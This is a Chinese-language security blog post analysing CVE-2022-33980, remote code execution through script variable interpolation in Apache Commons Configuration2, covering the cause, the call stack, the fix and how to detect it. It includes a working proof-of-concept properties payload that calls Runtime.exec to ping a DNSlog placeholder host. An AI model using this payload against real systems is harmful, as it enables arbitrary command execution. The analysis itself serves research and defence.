-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html
More file actions
386 lines (272 loc) · 30.2 KB
/
CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html
File metadata and controls
386 lines (272 loc) · 30.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.css" integrity="sha256-zM8WXtG4eUn7dKKNMTuoWZub++VnSfaOpA/8PJfvTBo=" crossorigin="anonymous">
<script class="next-config" data-name="main" type="application/json">{"hostname":"owefsad.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>
<meta name="description" content="Apache Commons Configuration2 是Apache基金会下的一款开源项目组件, 它是 Java 应用程序的配置管理工具,用于解析 properties、xml、ini 等格式的配置文件,构建应用程序的基础配置;通过 commons-configuration2 组件可以实现远程配置文件加载、配置文件监听与热更新等高级功能。">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2022-33980: Apache-Commons-Configuration2 ScriptEngine RCE">
<meta property="og:url" content="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html">
<meta property="og:site_name" content="owefsad">
<meta property="og:description" content="Apache Commons Configuration2 是Apache基金会下的一款开源项目组件, 它是 Java 应用程序的配置管理工具,用于解析 properties、xml、ini 等格式的配置文件,构建应用程序的基础配置;通过 commons-configuration2 组件可以实现远程配置文件加载、配置文件监听与热更新等高级功能。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-rce.png">
<meta property="og:image" content="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-sink.png">
<meta property="og:image" content="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-fixed.png">
<meta property="article:published_time" content="2022-07-11T16:09:48.000Z">
<meta property="article:modified_time" content="2025-06-21T08:45:38.047Z">
<meta property="article:author" content="owefsad">
<meta property="article:tag" content="ScriptEngine">
<meta property="article:tag" content="Apache-Commons-Configuration2">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-rce.png">
<link rel="canonical" href="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html">
<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html","path":"CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html","title":"CVE-2022-33980: Apache-Commons-Configuration2 ScriptEngine RCE"}</script>
<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>CVE-2022-33980: Apache-Commons-Configuration2 ScriptEngine RCE | owefsad</title>
<script src="/js/third-party/analytics/baidu-analytics.js" defer></script>
<script async src="https://hm.baidu.com/hm.js?2a72b138b6ef81ae123fcd18e91fa843"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.umd.js" integrity="sha256-hiUEBwFEpLF6DlB8sGXlKo4kPZ46Ui4qGpd0vrVkOm4=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>
<script src="/js/third-party/fancybox.js" defer></script>
<noscript>
<link rel="stylesheet" href="/css/noscript.css">
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<div class="column">
<header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<p class="site-title">owefsad</p>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">owefsad page</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger" aria-label="Search" role="button">
</div>
</div>
</div>
<nav class="site-nav">
<ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-resume"><a href="/resume/" rel="section"><i class="fa fa-user fa-fw"></i>resume</a></li>
</ul>
</nav>
</header>
<aside class="sidebar">
<div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
<div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-POC-%E5%8F%8A%E6%95%88%E6%9E%9C"><span class="nav-number">1.</span> <span class="nav-text">漏洞利用 POC 及效果</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.</span> <span class="nav-text">漏洞环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">漏洞原理分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%98%E6%96%B9%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%A1%88"><span class="nav-number">4.</span> <span class="nav-text">官方修复方案</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#IAST-SAST-%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B"><span class="nav-number">5.</span> <span class="nav-text">IAST/SAST 如何检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="nav-number">6.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">owefsad</p>
<div class="site-description" itemprop="description">分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具</div>
</div>
<div class="site-state-wrap animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">93</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/">
<span class="site-state-item-count">6</span>
<span class="site-state-item-name">categories</span></a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">173</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author animated">
<span class="links-of-author-item">
<a href="https://github.com/exexute" title="GitHub → https://github.com/exexute" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:1547147759@gmail.com" title="E-Mail → mailto:1547147759@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
</span>
</div>
</div>
</div>
</div>
</aside>
</div>
<div class="main-inner post posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
<link itemprop="mainEntityOfPage" href="https://owefsad.github.io/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="owefsad">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="owefsad">
<meta itemprop="description" content="分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具">
</span>
<span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
<meta itemprop="name" content="CVE-2022-33980: Apache-Commons-Configuration2 ScriptEngine RCE | owefsad">
<meta itemprop="description" content="">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
CVE-2022-33980: Apache-Commons-Configuration2 ScriptEngine RCE<a href="https://github.com/owefsad/blog/tree/main/source/_posts/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE.md" class="post-edit-link" title="Edit this post" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
</h1>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2022-07-12 00:09:48" itemprop="dateCreated datePublished" datetime="2022-07-12T00:09:48+08:00">2022-07-12</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">In</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/" itemprop="url" rel="index"><span itemprop="name">安全研究</span></a>
</span>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody"><p>Apache Commons Configuration2 是Apache基金会下的一款开源项目组件, 它是 Java 应用程序的配置管理工具,用于解析 properties、xml、ini 等格式的配置文件,构建应用程序的基础配置;通过 commons-configuration2 组件可以实现远程配置文件加载、配置文件监听与热更新等高级功能。</p>
<span id="more"></span>
<p>commons-configurations2 组件的 2.4 至 2.7 版本中,引入了变量语法,导致 ScriptEngine RCE 漏洞,该漏洞的产生原因与去年爆发的 log4j2shell 如出一辙,皆为通过格式化字符串指定内部的解析示例,然后触发漏洞;但是漏洞的利用条件较为苛刻,需要从外部传入配置文件、配置文件的值,并在应用程序中对恶意配置进行加载,才能触发漏洞,这也导致了该漏洞无人问津。</p>
<p>commons-configurations2 作为一款流行的三方组件,在超过 856 个三方组件中被引入,直接、间接引入项目的数量无法考量,影响面完全不逊色于 log4j2shell,但是,由于该漏洞利用难度过高、利用场景有限,因此无法像 log4j2shell、springshell 等漏洞一样在实战中使用。本文仅作简单研究,分析 CVE-2022-33980 漏洞的形成原因、利用方法、修复方案、IAST/SAST 检测思路及方法。<!--揭密如何通过 AST-Framework 平台挖掘此类 0 Day--></p>
<h2 id="漏洞利用-POC-及效果"><a href="#漏洞利用-POC-及效果" class="headerlink" title="漏洞利用 POC 及效果"></a>漏洞利用 POC 及效果</h2><p>以下 poc 在 Mac/Linux 环境中可使用: </p>
<figure class="highlight properties"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name</span>=<span class="string">${script:js:java.lang.Runtime.getRuntime().exec("ping -c 1 configuration2.<dnslog_key>.<dnslog_addr>")}</span></span><br></pre></td></tr></table></figure>
<p><img src="/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-rce.png"></p>
<h2 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>漏洞环境搭建</h2><p>本来没想自己打环境的,因为 trhacknon 和 xxx 已经构建好了一个<a target="_blank" rel="noopener" href="https://github.com/trhacknon/CVE-2022-33980-Apache-Commons-Configuration-RCE">漏洞环境</a>,分析之后发现该环境没有还原出全部的漏洞利用路径,因此有了下面的漏洞环境。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/VulScanSpace/AST-Vulns">AST-Vulns</a></p>
<h2 id="漏洞原理分析"><a href="#漏洞原理分析" class="headerlink" title="漏洞原理分析"></a>漏洞原理分析</h2><p><strong>漏洞示例代码</strong></p>
<ol>
<li>设置 properties 文件,创建 Configurations 实例化对象</li>
<li>通过 <code>config.getString(key)</code> 触发 configuration2 配置值的处理逻辑,触发漏洞</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@RequestMapping("properties")</span></span><br><span class="line"><span class="meta">@ResponseBody</span></span><br><span class="line"><span class="keyword">public</span> String <span class="title function_">properties</span><span class="params">(String filename)</span> <span class="keyword">throws</span> ConfigurationException {</span><br><span class="line"> <span class="type">Configurations</span> <span class="variable">configs</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Configurations</span>();</span><br><span class="line"> <span class="type">Configuration</span> <span class="variable">config</span> <span class="operator">=</span> configs.properties(filename);</span><br><span class="line"></span><br><span class="line"> Iterator<String> keys = config.getKeys();</span><br><span class="line"> <span class="keyword">while</span> (keys.hasNext()) {</span><br><span class="line"> <span class="type">String</span> <span class="variable">key</span> <span class="operator">=</span> keys.next();</span><br><span class="line"> <span class="comment">// FIXME 漏洞触发的入口方法</span></span><br><span class="line"> <span class="type">String</span> <span class="variable">value</span> <span class="operator">=</span> config.getString(key);</span><br><span class="line"> System.out.println(key + <span class="string">": "</span> + value);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"properties"</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>漏洞触发位置堆栈如下</strong></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">eval:<span class="number">264</span>, AbstractScriptEngine (javax.script)</span><br><span class="line">lookup:<span class="number">85</span>, ScriptStringLookup (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span><span class="selector-class">.text</span>.lookup)</span><br><span class="line">lookup:<span class="number">45</span>, StringLookupAdapter (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span><span class="selector-class">.configuration2</span>.interpol)</span><br><span class="line">resolve:<span class="number">497</span>, ConfigurationInterpolator (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span><span class="selector-class">.configuration2</span>.interpol)</span><br><span class="line">resolveSingleVariable:<span class="number">529</span>, ConfigurationInterpolator (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span><span class="selector-class">.configuration2</span>.interpol)</span><br><span class="line">interpolate:<span class="number">362</span>, ConfigurationInterpolator (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span><span class="selector-class">.configuration2</span>.interpol)</span><br><span class="line">to:<span class="number">115</span>, DefaultConversionHandler (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span><span class="selector-class">.configuration2</span>.convert)</span><br><span class="line">getAndConvertProperty:<span class="number">1754</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span>.configuration2)</span><br><span class="line">convert:<span class="number">1786</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span>.configuration2)</span><br><span class="line">getString:<span class="number">1344</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.commons</span>.configuration2)</span><br><span class="line">properties:<span class="number">27</span>, ConfigurationController (io<span class="selector-class">.ast</span><span class="selector-class">.vulns</span><span class="selector-class">.cve</span>.controller)</span><br><span class="line">testProperties:<span class="number">18</span>, ConfigurationControllerTest (io<span class="selector-class">.ast</span><span class="selector-class">.vulns</span><span class="selector-class">.cve</span>.controller)</span><br><span class="line">...</span><br><span class="line"><span class="selector-tag">main</span>:<span class="number">54</span>, JUnitStarter (com<span class="selector-class">.intellij</span><span class="selector-class">.rt</span>.junit)</span><br></pre></td></tr></table></figure>
<p><strong>漏洞分析</strong></p>
<p>根据堆栈可以看到,漏洞触发的位置为 <code>AbstractScriptEngine.eval</code> 方法。当在代码中调用 <code>config.getString(key)</code> 方法时,默认调用抽象类 <code>AbstractConfiguration</code> 的代码实现,获取到配置项的值之后,传入了 <code>ConfigurationInterpolator</code> 类的 <code>interpolate</code> 方法进行加工处理;</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> Object <span class="title function_">interpolate</span><span class="params">(Object value)</span> {</span><br><span class="line"> <span class="keyword">if</span> (value <span class="keyword">instanceof</span> String) {</span><br><span class="line"> <span class="type">String</span> <span class="variable">strValue</span> <span class="operator">=</span> (String)value;</span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">this</span>.looksLikeSingleVariable(strValue)) {</span><br><span class="line"> <span class="type">Object</span> <span class="variable">resolvedValue</span> <span class="operator">=</span> <span class="built_in">this</span>.resolveSingleVariable(strValue);</span><br><span class="line"> <span class="keyword">if</span> (resolvedValue != <span class="literal">null</span> && !(resolvedValue <span class="keyword">instanceof</span> String)) {</span><br><span class="line"> <span class="keyword">return</span> resolvedValue;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">this</span>.substitutor.replace(strValue);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">return</span> value;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>在 <code>interpolate</code> 方法中,如果发现配置的值为变量(判断条件: <code>strValue.startsWith("${") && strValue.endsWith("}")</code>),则调用 <code>resolveSingleVariable</code> 方法处理变量表达式;</p>
<p>configuration2 实现了很多的变量表达式的处理实现类,其中包括 <code>ScriptStringLookup</code> 类,在该类中,将表达式的值传入 <code>ScriptEngine</code> 接口的抽象类<code>AbstractScriptEngine</code>的 <code>eval</code> 方法中,触发漏洞。<br><img src="/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-sink.png"></p>
<h2 id="官方修复方案"><a href="#官方修复方案" class="headerlink" title="官方修复方案"></a>官方修复方案</h2><p>影响版本:[2.4,2.8.0)</p>
<p>在 2.8.0 版本中,官方默认不支持处理 <code>script</code> 变量,但是 <code>script</code> 变量的解析类还在,该修复方案修复的并不完善,存在绕过的可能。<br><img src="/CVE-2022-33980-Apache-Commons-Configuration2-ScriptEngine-RCE/cve-2022-33980-fixed.png"></p>
<h2 id="IAST-SAST-如何检测"><a href="#IAST-SAST-如何检测" class="headerlink" title="IAST/SAST 如何检测"></a>IAST/SAST 如何检测</h2><p>CVE-2022-33980 本质上为 ScriptEngine 代码执行漏洞,只需要传入特殊构造的 poc <code>${script:expr}</code>,即可调用 <code>ScriptEngine</code> 的 <code>eval</code> 方法执行 <code>expr</code> 中指定的代码,触发漏洞。因此,在 IAST/SAST 中检测漏洞时,只需要配置 sink 方法:<code>javax.script.ScriptEngine.eval(String script)</code>即可。</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/VulScanSpace/AST-Vulns">https://github.com/VulScanSpace/AST-Vulns</a></li>
</ul>
</div>
<footer class="post-footer">
<div class="followme">
<span>Welcome to my other publishing channels</span>
<div class="social-list">
<div class="social-item">
<span class="social-link">
<span class="icon">
<i class="fab fa-weixin"></i>
</span>
<span class="label">WeChat</span>
</span>
<img class="social-item-img" src="/uploads/wechat-qcode.jpg">
</div>
<div class="social-item">
<a target="_blank" class="social-link" href="/uploads/avatar.gif">
<span class="icon">
<i class="fab fa-qq"></i>
</span>
<span class="label">QQ</span>
</a>
</div>
</div>
</div>
<div class="post-tags">
<a href="/tags/ScriptEngine/" rel="tag"># ScriptEngine</a>
<a href="/tags/Apache-Commons-Configuration2/" rel="tag"># Apache-Commons-Configuration2</a>
</div>
<div class="post-nav">
<div class="post-nav-item">
<a href="/Java-Jsch%E7%BB%84%E4%BB%B6%E7%A0%94%E7%A9%B6.html" rel="prev" title="Java Jsch组件研究">
<i class="fa fa-angle-left"></i> Java Jsch组件研究
</a>
</div>
<div class="post-nav-item">
<a href="/Gin%E6%A1%86%E6%9E%B6-%E4%BB%8E0%E5%BC%80%E5%A7%8B%E6%90%AD%E5%BB%BA-Gin-Web-%E6%9C%8D%E5%8A%A1.html" rel="next" title="Gin框架: 从0开始搭建 Gin Web 服务">
Gin框架: 从0开始搭建 Gin Web 服务 <i class="fa fa-angle-right"></i>
</a>
</div>
</div>
</footer>
</article>
</div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
© 2017 –
<span itemprop="copyrightYear">2025</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">owefsad</span>
</div>
</div>
</footer>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<div class="sidebar-dimmer"></div>
<div class="back-to-top" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up fa-lg"></i>
<span>0%</span>
</div>
<a href="https://github.com/exexute" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
</body>
</html>